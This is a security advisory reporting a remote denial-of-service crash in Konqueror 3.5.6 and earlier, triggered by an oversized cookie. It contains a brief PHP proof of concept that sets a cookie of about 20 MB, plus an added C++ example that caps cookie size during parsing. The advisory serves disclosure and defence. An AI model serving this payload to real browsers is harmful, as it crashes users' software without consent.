Konqueror Remote Denial Of Service Nov 14 2007 03:33PM
laurent gaffie gmail com
Application: Konqueror <= 3.5.6

Web Site: http://www.konqueror.org/

Platform: Unix

Bug: Remote Denial of service

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Greets

5) Credits

===========

1) Introduction

===========

"Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)."

======

2) Bug

======

Konqueror does not handle large cookies: when a large cookie is sent, Konqueror crashes.

=====

3) Proof of concept

=====

Proof of concept example:

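<?php
// Raise PHP's memory limit so the large string below can be built.
ini_set("memory_limit", "200M");
// Send a single cookie whose value is 19,999,999 "A" characters.
setcookie("hi_fox", str_repeat("A", 19999999));
?>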

========

4) Greets

========

Berga,team soh, #futurezone, #soh

=====

5) Credits

=====

laurent gaffié
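
Added example, not part of the original advisory and not Konqueror's code: one way a cookie store can bound the input that triggers the crash in section 2, by refusing an oversized Set-Cookie value before it is copied or parsed. The 4096-byte cap is an assumption taken from the per-cookie minimum in RFC 6265 section 6.1; parseSetCookie, Cookie, CookieResult and kMaxCookieBytes are hypothetical names.

```cpp
#include <cstddef>
#include <string>

// Assumed cap, not taken from Konqueror: RFC 6265 section 6.1 only asks
// user agents to support 4096 bytes per cookie (name + value + attributes).
constexpr std::size_t kMaxCookieBytes = 4096;

enum class CookieResult { Accepted, TooLarge, Malformed };

struct Cookie {
    std::string name;
    std::string value;
};

// Strip leading and trailing spaces and tabs.
static std::string trim(const std::string& s) {
    const std::size_t first = s.find_first_not_of(" \t");
    if (first == std::string::npos) return std::string();
    return s.substr(first, s.find_last_not_of(" \t") - first + 1);
}

// Parse the value of one Set-Cookie header held in a receive buffer.
// The length check runs first, so an oversized header is dropped before
// any allocation or copy that scales with the sender-controlled length.
CookieResult parseSetCookie(const char* data, std::size_t len, Cookie& out) {
    if (len > kMaxCookieBytes) return CookieResult::TooLarge;

    const std::string header(data, len);  // bounded copy, at most 4096 bytes

    // name=value is everything before the first ';' (attributes follow).
    const std::string pair = header.substr(0, header.find(';'));
    const std::size_t eq = pair.find('=');
    if (eq == std::string::npos) return CookieResult::Malformed;

    const std::string name = trim(pair.substr(0, eq));
    if (name.empty()) return CookieResult::Malformed;  // RFC 6265: ignore

    out.name = name;
    out.value = trim(pair.substr(eq + 1));
    return CookieResult::Accepted;
}
```

The same bound belongs on the HTTP header reader itself, so the oversized line is never buffered in full.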

Copyright 2010, SecurityFocus